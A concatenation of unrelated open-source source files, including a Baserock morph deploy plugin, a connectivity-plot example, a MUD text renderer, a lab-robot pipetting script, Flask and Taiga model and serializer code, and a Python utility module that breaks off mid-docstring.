old_status_prefix = self.app.status_prefix
system_status_prefix = '%s[%s]' % (old_status_prefix, system['morph'])
self.app.status_prefix = system_status_prefix
try:
# Find the artifact to build
morph = morphlib.util.sanitise_morphology_path(system['morph'])
srcpool = build_command.create_source_pool(build_repo, ref, morph)
artifact = build_command.resolve_artifacts(srcpool)
deploy_defaults = system.get('deploy-defaults', {})
for system_id, deploy_params in system['deploy'].iteritems():
if not system_id in deployment_filter and deployment_filter:
continue
deployment_status_prefix = '%s[%s]' % (
system_status_prefix, system_id)
self.app.status_prefix = deployment_status_prefix
try:
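                    # Added note: env_vars arrive as "SYSTEM.KEY=VALUE" strings; the slice below
                    # drops the "<system_id>." prefix so only pairs addressed to this system remain.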
user_env = morphlib.util.parse_environment_pairs(
os.environ,
[pair[len(system_id)+1:]
for pair in env_vars
if pair.startswith(system_id)])
final_env = dict(deploy_defaults.items() +
deploy_params.items() +
user_env.items())
is_upgrade = ('yes' if self.app.settings['upgrade']
else 'no')
final_env['UPGRADE'] = is_upgrade
deployment_type = final_env.pop('type', None)
if not deployment_type:
raise morphlib.Error('"type" is undefined '
'for system "%s"' % system_id)
location = final_env.pop('location', None)
if not location:
raise morphlib.Error('"location" is undefined '
'for system "%s"' % system_id)
morphlib.util.sanitize_environment(final_env)
self.check_deploy(root_repo_dir, ref, deployment_type,
location, final_env)
system_tree = self.setup_deploy(build_command,
deploy_tempdir,
root_repo_dir,
ref, artifact,
deployment_type,
location, final_env)
for subsystem in system.get('subsystems', []):
self.deploy_system(build_command, deploy_tempdir,
root_repo_dir, build_repo,
ref, subsystem, env_vars, [],
parent_location=system_tree)
if parent_location:
deploy_location = os.path.join(parent_location,
location.lstrip('/'))
else:
deploy_location = location
self.run_deploy_commands(deploy_tempdir, final_env,
artifact, root_repo_dir,
ref, deployment_type,
system_tree, deploy_location)
finally:
self.app.status_prefix = system_status_prefix
finally:
self.app.status_prefix = old_status_prefix
def upgrade(self, args):
'''Upgrade an existing set of instances using built images.
See `morph help deploy` for documentation.
'''
if not args:
raise cliapp.AppException(
'Too few arguments to upgrade command (see `morph help '
'deploy`)')
if self.app.settings['upgrade']:
raise cliapp.AppException(
'Running `morph upgrade --upgrade` does not make sense.')
self.app.settings['upgrade'] = True
self.deploy(args)
def check_deploy(self, root_repo_dir, ref, deployment_type, location, env):
# Run optional write check extension. These are separate from the write
# extension because it may be several minutes before the write
# extension itself has the chance to raise an error.
try:
self._run_extension(
root_repo_dir, deployment_type, '.check',
[location], env)
except morphlib.extensions.ExtensionNotFoundError:
pass
def setup_deploy(self, build_command, deploy_tempdir, root_repo_dir, ref,
artifact, deployment_type, location, env):
# deployment_type, location and env are only used for saving metadata
# Create a tempdir to extract the rootfs in
system_tree = tempfile.mkdtemp(dir=deploy_tempdir)
try:
# Unpack the artifact (tarball) to a temporary directory.
self.app.status(msg='Unpacking system for configuration')
if build_command.lac.has(artifact):
f = build_command.lac.get(artifact)
elif build_command.rac.has(artifact):
build_command.cache_artifacts_locally([artifact])
f = build_command.lac.get(artifact)
else:
raise cliapp.AppException('Deployment failed as system is'
' not yet built.\nPlease ensure'
' the system is built before'
' deployment.')
tf = tarfile.open(fileobj=f)
tf.extractall(path=system_tree)
self.app.status(
msg='System unpacked at %(system_tree)s',
system_tree=system_tree)
self.app.status(
msg='Writing deployment metadata file')
metadata = self.create_metadata(
artifact, root_repo_dir, deployment_type, location, env)
metadata_path = os.path.join(
system_tree, 'baserock', 'deployment.meta')
with morphlib.savefile.SaveFile(metadata_path, 'w') as f:
json.dump(metadata, f, indent=4,
sort_keys=True, encoding='unicode-escape')
return system_tree
except Exception:
shutil.rmtree(system_tree)
raise
def run_deploy_commands(self, deploy_tempdir, env, artifact, root_repo_dir,
ref, deployment_type, system_tree, location):
# Extensions get a private tempdir so we can more easily clean
# up any files an extension left behind
deploy_private_tempdir = tempfile.mkdtemp(dir=deploy_tempdir)
env['TMPDIR'] = deploy_private_tempdir
try:
# Run configuration extensions.
self.app.status(msg='Configure system')
names = artifact.source.morphology['configuration-extensions']
for name in names:
self._run_extension(
root_repo_dir,
name,
'.configure',
[system_tree],
env)
# Run write extension.
self.app.status(msg='Writing to device')
self._run_extension(
root_repo_dir,
deployment_type,
'.write',
[system_tree, location],
env)
finally:
# Cleanup.
self.app.status(msg='Cleaning up')
shutil.rmtree(deploy_private_tempdir)
def _report_extension_stdout(self, line):
self.app.status(msg=line.replace('%s', '%%'))
def _report_extension_stderr(self, error_list):
def cb(line):
error_list.append(line)
sys.stderr.write('%s\n' % line)
return cb
def _report_extension_logger(self, name, kind):
return lambda line: logging.debug('%s%s: %s', name, kind, line)
def _run_extension(self, gd, name, kind, args, env):
'''Run an extension.
The ``kind`` should be either ``.configure`` or ``.write``,
depending on the kind of extension that is sought.
The extension is found either in the git repository of the
system morphology (repo, ref), or with the Morph code.
'''
error_list = []
with morphlib.extensions.get_extension_filename(name, kind) as fn:
ext = morphlib.extensions.ExtensionSubprocess(
report_stdout=self._report_extension_stdout,
report_stderr=self._report_extension_stderr(error_list),
report_logger=self._report_extension_logger(name, kind),
)
returncode = ext.run(fn, args, env=env, cwd=gd.dirname)
if returncode == 0:
logging.info('%s%s succeeded', name, kind)
else:
message = '%s%s failed with code %s: %s' % (
name, kind, returncode, '\n'.join(error_list))
raise cliapp.AppException(message)
def create_metadata(self, system_artifact, root_repo_dir, deployment_type,
location, env):
'''Deployment-specific metadata.
The `build` and `deploy` operations must be from the same ref, so full
info on the root repo that the system came from is in
/baserock/${system_artifact}.meta and is not duplicated here. We do
store a `git describe` of the definitions.git repo as a convenience for
post-upgrade hooks that we may need to implement at a future date:
the `git describe` output lists the last tag, which will hopefully help
us to identify which release of a system was deployed without having to
keep a list of SHA1s somewhere or query a Trove.
'''
def remove_passwords(env):
is_password = morphlib.util.env_variable_is_password
return { k:v for k, v in env.iteritems() if not is_password(k) }
meta = {
'system-artifact-name': system_artifact.name,
'configuration': remove_passwords(env),
'deployment-type': deployment_type,
'location': location,
'definitions-version': {
'describe': root_repo_dir.describe(),
},
'morph-version': {
'ref': morphlib.gitversion.ref,
'tree': morphlib.gitversion.tree,
'commit': morphlib.gitversion.commit,
'version': morphlib.gitversion.version,
},
}
return meta
|
gpl-2.0
| -7,916,551,351,011,835,000
| 42.882698
| 79
| 0.57351
| false
| 4.669683
| true
| false
| false
|
pravsripad/jumeg
|
examples/connectivity/plot_grouped_connectivity_circle.py
|
2
|
1374
|
#!/usr/bin/env python
'''
Example showing how to read grouped aparc labels from yaml file and plot
grouped connectivity circle with these labels.
Author: Praveen Sripad <pravsripad@gmail.com>
'''
import numpy as np
from jumeg import get_jumeg_path
from jumeg.connectivity import plot_grouped_connectivity_circle
import yaml
labels_fname = get_jumeg_path() + '/data/desikan_label_names.yaml'
yaml_fname = get_jumeg_path() + '/data/desikan_aparc_cortex_based_grouping.yaml'
replacer_dict_fname = get_jumeg_path() + '/data/replacer_dictionaries.yaml'
with open(labels_fname, 'r') as f:
label_names = yaml.safe_load(f)['label_names']
with open(replacer_dict_fname, 'r') as f:
replacer_dict = yaml.safe_load(f)['replacer_dict_aparc']
# make a random matrix with 68 nodes
# use simple seed for reproducibility
np.random.seed(42)
con = np.random.random((68, 68))
con[con < 0.5] = 0.
indices = (np.array((1, 2, 3)), np.array((5, 6, 7)))
plot_grouped_connectivity_circle(yaml_fname, con, label_names,
labels_mode='replace',
replacer_dict=replacer_dict,
out_fname='example_grouped_con_circle.png',
colorbar_pos=(0.1, 0.1),
n_lines=10, colorbar=True,
colormap='viridis')
|
bsd-3-clause
| -3,088,841,760,635,333,600
| 35.157895
| 80
| 0.624454
| false
| 3.202797
| false
| false
| false
|
buckets1337/UOMUMM
|
src/Renderer.py
|
1
|
5959
|
# Renderer.py
# Various ways to format text output to players
class Renderer():
'''
A renderer component just contains methods for formatting text output in various ways
'''
def __init__(self, server):
self.owner = server
def formatMessage(self, message, width):
'''
splits a <message> string into lines that are <width> characters long without breaking words
apart across lines. Broken apart single lines are slightly indented on every line other than
the first in the final formatted message.
Returns the formatted message string.
'''
count = 0
formatted = ''
        if message is None:
message = 'None'
for character in range(0,len(message)):
char = message[character]
if char != '\n':
if count < width:
formatted += char
count += 1
#print formatted
else:
if message[character] == ' ':
formatted += "\n" + char
count = 2
#print 'da TRUTH'
else:
collecting = True
coll = ''
i = 1
while collecting:
if message[character-i] != '\n':
coll += message[character-i]
i += 1
else:
collecting = False
if ' ' not in coll.strip():
#print 'TRUE'
formatted += "\n " + char
count = 2
else:
#print 'checking...'
checking = True
i = 1
while checking:
msg = message.strip()
chk = msg[character-i]
#print chk
if chk == ' ':
#print formatted
formatted = formatted[:-i] + "\n" + formatted[-i:] + char
#print formatted
count = i + 1
checking = False
else:
i += 1
else:
formatted += char
count = 0
return formatted
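    # Illustrative call (added, hypothetical values):
    #   renderer.formatMessage("some long message ...", 76)
    # returns the text re-wrapped so no line exceeds 76 characters; a word that would be
    # split across a line boundary is carried to the next line, which is slightly indented.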
def messageBox(self, client, title, message):
'''
displays a simple <message> in a box for <client>.
The box resizes to fit the message and title.
Has a <title> at the top of the box along the border.
'''
message = self.formatMessage(message, 76)
#print message
if message.endswith("\n"):
message = message[:-1]
msgLines = message.split('\n')
#print msgLines
finalMsg = ''
longest = 0
for line in msgLines:
if len(line) > longest:
longest = len(line)
for line in msgLines:
if longest > len(str(title)):
if longest > len(line):
mod = longest - len(line)
line = line + ((mod) * " ")
# else:
# line = line + ((len(str(title)) - 4) * " ")
else:
mod = (len(str(title)) + 2) - len(line)
line = line + (mod * " ")
line = " | " + line + " |\n"
finalMsg += line
#print int((0.5)*float(longest))
if longest >= len(str(title)):
titleLine = "\n " + (int((0.5)*float(longest - len(str(title)))+1)* "_") + "^!"+str(title)+"^~" + (int((0.5)*float(longest - len(str(title)))+1)* "_") + "\n"
titleLineLen = len(titleLine) - 6
if titleLineLen > (longest + 2):
#print len(titleLine)
#print longest + 2
diff = titleLineLen - (longest + 2) - 1
if not diff <= 0:
titleLine = titleLine[:-diff] + "\n"
if diff == 0:
titleLine = titleLine[:-1] + "_\n"
elif (longest + 2) >= titleLineLen:
diff = (longest + 2) - titleLineLen
if titleLine.endswith("\n"):
titleLine = titleLine[:-1]
titleLine += (diff * "_") + "\n"
client.send_cc(titleLine)
client.send_cc(" |" + ((longest + 2)*" ") + "|\n")
client.send_cc(finalMsg)
client.send_cc(" |" + ((longest + 2)*"_") + "|\n\n")
else:
client.send_cc("\n __^!" + str(title) + "^~__\n")
client.send_cc(" |" + ((4 + len(str(title))) * " ") + "|\n")
client.send_cc(finalMsg)
client.send_cc(" |" + ((4 + len(str(title))) * "_") + "|\n\n")
def roomDisplay(self, client, room):
'''
renders the typical display for a room to client
'''
namePad = 80 - len(room.name) - 2
client.send_cc("\n")
message = "+" + ("-" * (int(0.5 *namePad)-1)) + "^! " + str(room.name) + " ^~" + ("-" * (int(0.5* namePad)-1)) + "+" + "\n"
if len(message) < 81:
message = "+" + ("-" * (int(0.5 *namePad)-1)) + "^! " + str(room.name) + " ^~" + ("-" * (int(0.5* namePad)-1)) + "-+" + "\n"
client.send_cc(message)
# client.send_cc("|" + (" " * 78) + "|" + "\n")
descrip = self.formatMessage(room.description, 76)
desc = descrip.split("\\n")
#print desc
for line in desc:
linePad = 80 - len(line) - 2
if len(line) > 0:
message = "|" +(" " * (int(0.5 *linePad))) + line +(" " * (int(0.5 *linePad))) + "|" + "\n"
if len(message) < 81:
message = ("|" +(" " * (int(0.5 *linePad))) + line +(" " * (int(0.5 *linePad))) + " |" + "\n")
client.send_cc(message)
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("+" + ("-" * 78) + "+" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
#print "players: " + str(room.players)
for player in room.players:
if player.connection != client:
playerPad = int(80 - len(player.name) - 3)
client.send_cc("| " + "^C" + str(player.name) + "^~" + (" " * playerPad) + "|" + "\n")
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
exitList = []
if room.orderedExits == []:
#print 'test'
#print room.exits
for exit in room.exits:
#print room.exits[exit]
exitList.append(str(room.exits[exit]))
room.orderedExits = exitList
else:
for rm in room.orderedExits:
exitList.append(str(rm[1]))
#print exitList
if exitList != []:
lenExit = len(exitList[0])
else:
lenExit = 0
firstPad = int(80 - lenExit - 12)
if exitList != []:
msg = "| " + "^!exits:^~ 1." + exitList[0] + (" " * firstPad) + "|" + "\n"
client.send_cc(msg)
i = 2
for exit in exitList[1:]:
pad = int(80 - len(exitList[i-1]) - 12)
client.send_cc("| " + str(i) + "." + exitList[i-1] + (" " * pad) + "|" + "\n")
i += 1
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("+" + ("-" * 78) + "+" + "\n")
|
apache-2.0
| -8,190,471,305,137,985,000
| 28.8
| 161
| 0.52492
| false
| 2.802916
| false
| false
| false
|
tdlong/YeastRobot
|
UserPrograms/ASE/Rearray_day3_pilot_1.py
|
1
|
1439
|
import sys
# where RobotControl.py, etc lives
sys.path.append('/home/pi/Desktop/ADL/YeastRobot/PythonLibrary')
from RobotControl import *
#################################
### Define Deck Layout
#################################
deck="""\
DW96W SW96P SW96P SW96P SW96P SW96P SW96P BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
"""
# 2 3 4 5 6
# note the 1st user defined column is "2" not zero or one, since tips are at 0 & 1
##################################
myvol = 140
# 1 = UL of BoxA, 2 = UR of BoxA, 3 = LL of BoxA, etc.
OffsetDict={0: 'UL', 1: 'UR', 2: 'LL', 3: 'LR'}
# read in deck, etc
DefineDeck(deck)
printDeck()
InitializeRobot()
CurrentTipPosition = 1
for offset in [0,1,2,3]:
CurrentTipPosition = retrieveTips(CurrentTipPosition)
extraSeatTips()
# initial mix
position(0,2, position = OffsetDict[offset])
mix(300,98,100,5)
# From DW96W to SW96P with 140ul of glycerol
# 6 replicate glycerol stocks
for i in [3,4,5,6,7,8]:
position(0,2, position = OffsetDict[offset])
aspirate(myvol,depth=99,speed=50, mix=3)
position(0,i, position = OffsetDict[offset])
moveDispense(myvol, startdepth = 95, enddepth=60, speed = 50)
disposeTips()
position(0,0)
ShutDownRobot()
quit()
|
gpl-3.0
| -2,579,611,862,031,048,700
| 27.215686
| 84
| 0.603892
| false
| 2.699812
| false
| false
| false
|
cchristelis/watchkeeper
|
django_project/healthsites/utils.py
|
1
|
1525
|
__author__ = 'Irwan Fathurrahman <irwan@kartoza.com>'
__date__ = '25/04/16'
__license__ = "GPL"
__copyright__ = 'kartoza.com'
import os
import json
from django.conf import settings
from django.core.serializers.json import DjangoJSONEncoder
from healthsites.map_clustering import cluster, parse_bbox
from healthsites.models.healthsite import Healthsite
def healthsites_clustering(bbox, zoom, iconsize):
# parse request params
if zoom <= settings.CLUSTER_CACHE_MAX_ZOOM:
# if geoname and tag are not set we can return the cached layer
# try to read healthsitesfrom disk
filename = os.path.join(
settings.CLUSTER_CACHE_DIR,
'{}_{}_{}_healthsites.json'.format(zoom, *iconsize)
)
try:
cached_locs = open(filename, 'rb')
cached_data = cached_locs.read()
return cached_data
except IOError as e:
localities = Healthsite.objects.all()
object_list = cluster(localities, zoom, *iconsize)
# create the missing cache
            # json.dump() writes to the file and returns None, so build the string once,
            # cache it, and return it
            with open(filename, 'wb') as cache_file:
                json_dump = json.dumps(object_list)
                cache_file.write(json_dump)
            return json_dump
else:
# make polygon
bbox_poly = parse_bbox(bbox)
# cluster healthsites for a view
healthsites = Healthsite.objects.filter(point_geometry__contained=bbox_poly)
object_list = cluster(healthsites, zoom, *iconsize)
return json.dumps(object_list, cls=DjangoJSONEncoder)
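# Hedged usage sketch (added; hypothetical Django view, not part of this module; the bbox string
# format depends on parse_bbox and the icon size is an assumed value):
#   def healthsites_view(request):
#       bbox = request.GET.get('bbox')
#       zoom = int(request.GET.get('zoom', 0))
#       data = healthsites_clustering(bbox, zoom, (48, 48))
#       return HttpResponse(data, content_type='application/json')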
|
bsd-2-clause
| -7,391,638,456,330,655,000
| 34.465116
| 84
| 0.64
| false
| 3.84131
| false
| false
| false
|
kmerenkov/clitter
|
setup.py
|
1
|
1981
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2008, Konstantin Merenkov <kmerenkov@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Konstantin Merenkov <kmerenkov@gmail.com> ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Konstantin Merenkov <kmerenkov@gmail.com> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils.core import setup
setup(name='clitter',
version='0.1',
description='Command line twitter client',
author='Konstantin Merenkov',
author_email='kmerenkov@gmail.com',
url='http://github.com/kmerenkov/clitter/',
packages=['clitter/twitter', 'clitter'],
scripts=['bin/clitter'])
|
bsd-3-clause
| 7,848,016,887,700,294,000
| 52.540541
| 91
| 0.745583
| false
| 4.084536
| false
| false
| false
|
Debian/dak
|
daklib/termcolor.py
|
1
|
1725
|
# vim:set et sw=4:
"""
TermColor utils for dak
@contact: Debian FTP Master <ftpmaster@debian.org>
@copyright: 2019 Mo Zhou <lumin@debian.org>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
###############################################################################
__all__ = []
###############################################################################
_COLORS_ = ('red', 'green', 'yellow', 'blue', 'violet', 'cyan', 'white')
_COLOR_CODES_ = {k: 31 + _COLORS_.index(k) for k in _COLORS_}
def colorize(s, fg, bg=None, bold=False, ul=False):
'''
s: str -- string to be colorized
fg: str/int -- foreground color. See _COLORS_ for choices
bg: str/int -- background color. See _COLORS_ for choices
bold: bool -- bold font?
ul: bool -- underline?
'''
if fg not in _COLORS_:
raise ValueError("Unsupported foreground Color!")
if (bg is not None) or any((bold, ul)):
raise NotImplementedError
return "\x1b[{}m{}\x1b[0;m".format(_COLOR_CODES_[fg], s)
|
gpl-2.0
| -1,461,835,152,391,277,600
| 36.5
| 79
| 0.624928
| false
| 3.938356
| false
| false
| false
|
alissonpintor/stoky
|
app/basemodel.py
|
1
|
1966
|
from flask_sqlalchemy import Model
from sqlalchemy import exc as core_exc
from sqlalchemy.orm import exc
class Result(object):
"""
    Class that holds the result of an operation (a status flag plus a message)
"""
def __init__(self, status, message):
self.status = status
self.message = message
class BaseModel(Model):
"""
    Base Model class containing common methods
    such as delete, search by id and update
"""
def update(self):
from app import db
try:
db.session.add(self)
db.session.commit()
return Result(status=True, message='Registro realizado com sucesso')
except Exception as e:
return Result(status=False, message=str(e))
def delete(self):
from app import db
try:
db.session.delete(self)
db.session.commit()
return Result(status=True, message='Registro excluído com sucesso')
except core_exc.IntegrityError:
return Result(status=False, message='Não foi possível excluir. Erro de Integridade')
except Exception as e:
return Result(status=False, message=str(e))
@classmethod
def by_id(cls, id):
from app import db
primary_key = db.inspect(cls).primary_key[0]
data = db.session.query(
cls
).filter(
primary_key==id
).first()
return data
@classmethod
def by(cls, **kwargs):
from app import db
data = db.session.query(cls)
for k, v in kwargs.items():
if k.upper() in cls.__table__.columns.keys():
column = cls.__table__.columns[k.upper()]
data = data.filter(column==v)
data = data.first()
return data
@classmethod
def all(cls):
from app import db
data = cls.query.all()
return data
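# Hedged usage sketch (added; assumes a hypothetical model class built on this base, e.g. Product(db.Model)):
#   product = Product.by_id(10)          # lookup by primary key
#   result = product.update()           # persists the row and returns a Result(status, message)
#   if not result.status:
#       print(result.message)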
|
gpl-3.0
| -4,292,930,550,900,183,600
| 24.842105
| 96
| 0.545593
| false
| 4.248918
| false
| false
| false
|
brigittebigi/proceed
|
proceed/src/wxgui/sp_icons.py
|
1
|
2562
|
import os.path
from sp_glob import ICONS_PATH
# Frames
APP_ICON = os.path.join(ICONS_PATH, "app.ico")
APP_CHECK_ICON = os.path.join(ICONS_PATH, "appcheck.ico")
APP_EXPORT_PDF_ICON = os.path.join(ICONS_PATH, "appexport-pdf.ico")
# For the toolbar of the main frame
EXIT_ICON = os.path.join(ICONS_PATH, "exit.png")
OPEN_ICON = os.path.join(ICONS_PATH, "open.png")
SAVE_ICON = os.path.join(ICONS_PATH, "save.png")
CHECK_ICON = os.path.join(ICONS_PATH, "check.png")
EXPORT_ICON = os.path.join(ICONS_PATH, "export.png")
ADD_ICON = os.path.join(ICONS_PATH, "add.png")
EDIT_ICON = os.path.join(ICONS_PATH, "edit.png")
DELETE_ICON = os.path.join(ICONS_PATH, "delete.png")
ABOUT_ICON = os.path.join(ICONS_PATH, "about.png")
FEEDBACK_ICON = os.path.join(ICONS_PATH, "feedback.png")
CANCEL_ICON = os.path.join(ICONS_PATH, "cancel.png")
APPLY_ICON = os.path.join(ICONS_PATH, "apply.png")
HELP_ICON = os.path.join(ICONS_PATH, "help.png" )
FORWARD_ICON = os.path.join(ICONS_PATH, "forward.png" )
BACKWARD_ICON = os.path.join(ICONS_PATH, "backward.png" )
NEXT_ICON = os.path.join(ICONS_PATH, "next.png")
PREVIOUS_ICON = os.path.join(ICONS_PATH, "previous.png")
HOME_ICON = os.path.join(ICONS_PATH, "home.png" )
LOGOUT_ICON = os.path.join(ICONS_PATH, "logout.png" )
SETTINGS_ICON = os.path.join(ICONS_PATH, "settings.png" )
# For the other frames
AUTHOR_ICON = os.path.join(ICONS_PATH, "author.png")
DOCUMENT_ICON = os.path.join(ICONS_PATH, "document.png")
SESSION_ICON = os.path.join(ICONS_PATH, "session.png")
CONFERENCE_ICON = os.path.join(ICONS_PATH, "conference.png")
IMPORT_EXPORT_ICON = os.path.join(ICONS_PATH, "import-export.png")
GRID_ICON = os.path.join(ICONS_PATH, "grid.png")
TEX_ICON = os.path.join(ICONS_PATH, "tex.png")
WWW_ICON = os.path.join(ICONS_PATH, "www.png")
PROCESS_ICON = os.path.join(ICONS_PATH, "process.png")
# For the Feedback form
MAIL_DEFAULT_ICON = os.path.join(ICONS_PATH, "maildefault.png")
MAIL_GMAIL_ICON = os.path.join(ICONS_PATH, "mailgoogle.png")
MAIL_OTHER_ICON = os.path.join(ICONS_PATH, "mailother.png")
CHECKED_ICON = os.path.join(ICONS_PATH, "check.ico")
UNCHECKED_ICON = os.path.join(ICONS_PATH, "uncheck.ico")
RADIOCHECKED_ICON = os.path.join(ICONS_PATH, "radiocheck.ico")
RADIOUNCHECKED_ICON = os.path.join(ICONS_PATH, "radiouncheck.ico")
|
gpl-3.0
| 8,382,389,665,049,526,000
| 46.444444
| 67
| 0.639344
| false
| 2.660436
| false
| false
| false
|
bdang2012/taiga-back-casting
|
taiga/external_apps/serializers.py
|
1
|
2126
|
# Copyright (C) 2014-2015 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014-2015 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2015 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
from taiga.base.api import serializers
from . import models
from . import services
from django.utils.translation import ugettext as _
class ApplicationSerializer(serializers.ModelSerializer):
class Meta:
model = models.Application
fields = ("id", "name", "web", "description", "icon_url")
class ApplicationTokenSerializer(serializers.ModelSerializer):
cyphered_token = serializers.CharField(source="cyphered_token", read_only=True)
next_url = serializers.CharField(source="next_url", read_only=True)
application = ApplicationSerializer(read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("user", "id", "application", "auth_code", "next_url")
class AuthorizationCodeSerializer(serializers.ModelSerializer):
next_url = serializers.CharField(source="next_url", read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("auth_code", "state", "next_url")
class AccessTokenSerializer(serializers.ModelSerializer):
cyphered_token = serializers.CharField(source="cyphered_token", read_only=True)
next_url = serializers.CharField(source="next_url", read_only=True)
class Meta:
model = models.ApplicationToken
fields = ("cyphered_token", )
|
agpl-3.0
| -6,451,691,023,716,321,000
| 36.928571
| 83
| 0.733992
| false
| 3.827027
| false
| false
| false
|
9wfox/mvc
|
utility.py
|
1
|
6713
|
# -*- coding:utf-8 -*-
"""
    Utilities
    History:
        2011-08-03  + Refactored get_pys_members.
        2011-08-15  * Modified con_mongo_object to support ObjectId.
        2011-08-20  + Added template_path, static_path.
        2011-08-25  * Moved the argument-checking functions over from logic.
        2011-08-27  * Refactored get_pys_members and renamed it get_members.
"""
from datetime import datetime
from sys import argv
from os import walk, listdir
from os.path import abspath, join as path_join, dirname, basename, splitext
from fnmatch import fnmatch
from hashlib import md5
from base64 import b64encode, b64decode
from inspect import ismodule, getmembers
from bson.objectid import ObjectId
try:
from pyDes import des, triple_des, PAD_PKCS5, CBC
_enc_key = lambda length: __conf__.ENCRYPT_KEY.zfill(length)[:length]
_cipher = lambda: des(_enc_key(8), mode = CBC, IV = "\0" * 8, padmode = PAD_PKCS5)
except:
pass
### Application path helpers ############################################################################
ROOT_PATH = dirname(abspath(argv[0]))
app_path = lambda n: path_join(ROOT_PATH, n)
template_path = lambda n: path_join(ROOT_PATH, "{0}/{1}".format(__conf__.TEMPLATE_DIR_NAME, n))
static_path = lambda n: path_join(ROOT_PATH, "{0}/{1}".format(__conf__.STATIC_DIR_NAME, n))
### Decorators ##########################################################################################
def staticclass(cls):
def new(cls, *args, **kwargs):
raise RuntimeError("Static Class")
setattr(cls, "__new__", staticmethod(new))
return cls
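# Hedged usage sketch (illustrative only): a class decorated with
# @staticclass can be used as a namespace but never instantiated.
#
#   @staticclass
#   class Config(object):
#       DEBUG = True
#
#   Config.DEBUG   # attribute access works
#   Config()       # raises RuntimeError("Static Class")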
class sealedclass(type):
"""
metaclass: Sealed Class
"""
_types = set()
def __init__(cls, name, bases, attr):
for t in bases:
if t in cls._types: raise SyntaxError("sealed class")
cls._types.add(cls)
class partialclass(type):
"""
metaclass: Partial Class
class A(object):
y = 456
def test(self): print "test"
class B(object):
__metaclass__ = partialclass
__mainclass__ = A
x = 1234
def do(self):
self.test()
print self.x, self.y
A().do()
"""
def __init__(cls, name, bases, attr):
print "cls:", cls
print "name:", name
print "bases:", bases
print "attr:", attr
main_class = attr.pop("__mainclass__")
map(lambda a: setattr(main_class, a[0], a[1]), [(k, v) for k, v in attr.items() if "__" not in k])
### Miscellaneous helpers ###############################################################################
def get_modules(pkg_name, module_filter = None):
"""
        Return every module in the package that matches the filter.

        Args:
            pkg_name        package name
            module_filter   module-name filter: def (module_name)
"""
path = app_path(pkg_name)
#py_filter = lambda f: all((fnmatch(f, "*.py"), not f.startswith("__"), module_filter and module_filter(f) or True))
py_filter = lambda f: all((fnmatch(f, "*.pyc") or fnmatch(f, "*.py"), not f.startswith("__"), module_filter and module_filter(f) or True))
names = [splitext(n)[0] for n in listdir(path) if py_filter(n)]
return [__import__("{0}.{1}".format(pkg_name, n)).__dict__[n] for n in names]
def get_members(pkg_name, module_filter = None, member_filter = None):
"""
        Return every member of the package's modules that matches the filters.

        Args:
            pkg_name        package name
            module_filter   module-name filter: def (module_name)
            member_filter   member filter: def member_filter(module_member_object)
"""
modules = get_modules(pkg_name, module_filter)
ret = {}
for m in modules:
members = dict(("{0}.{1}".format(v.__module__, k), v) for k, v in getmembers(m, member_filter))
ret.update(members)
return ret
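# Hedged usage sketch (illustrative only; the package name is an assumption):
#
#   from inspect import isclass
#   handlers = get_members("handler", member_filter=isclass)
#   # keys look like "handler.index.IndexHandler", values are the objects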
def set_default_encoding():
"""
        Set the system default encoding.
"""
import sys, locale
reload(sys)
lang, coding = locale.getdefaultlocale()
#sys.setdefaultencoding(coding)
def conv_mongo_object(d):
"""
        Normalise a MongoDB result by converting:
        (1) unicode values back to str.
        (2) ObjectId (and datetime) values back to str.
"""
